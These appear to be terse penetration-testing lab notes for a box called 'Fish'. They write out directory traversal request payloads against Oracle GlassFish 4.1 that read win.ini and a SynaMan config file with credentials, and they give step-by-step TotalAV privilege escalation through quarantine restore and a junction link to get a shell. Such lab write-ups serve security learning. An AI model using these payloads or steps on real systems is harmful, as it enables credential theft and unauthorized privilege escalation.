Fish
Enumeration
http://192.168.234.168:6060/app - Synametrics Web Server 7 (Syncrify)
SynaMan - Synametrics File Manager 4.0
SynaMan 4.0 build 1488 - SMTP Credential Disclosure
https://www.exploit-db.com/exploits/45387
C:\SynaMan\config>type AppConfig.xml
Oracle GlassFish Server 4.1 - Directory Traversal
https://www.exploit-db.com/exploits/39441
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated.
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
view-source:http://192.168.177.168:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/appconfig.xml
Initial Access
PrivEsc
TotalAV 4.14.31.0
TotalAV 2020 4.14.31 - Privilege Escalation
https://www.exploit-db.com/exploits/47897
https://www.youtube.com/watch?v=88qeaLq98Gc
Create these dirs: ForTotalAV -> MountPoint
Quick scan -> Custom Scan -> Add the file -> Start Custom Scan
Action -> Quarantine the file
Delete MountPoint Dir
Then create symbolic link:
mklink /j \Users\arthur\Desktop\ForTotalAV\MountPoint \Windows\Microsoft.NET\Framework\v4.0.30319
Then restore file -> restart computer -> finally get shell
Last updated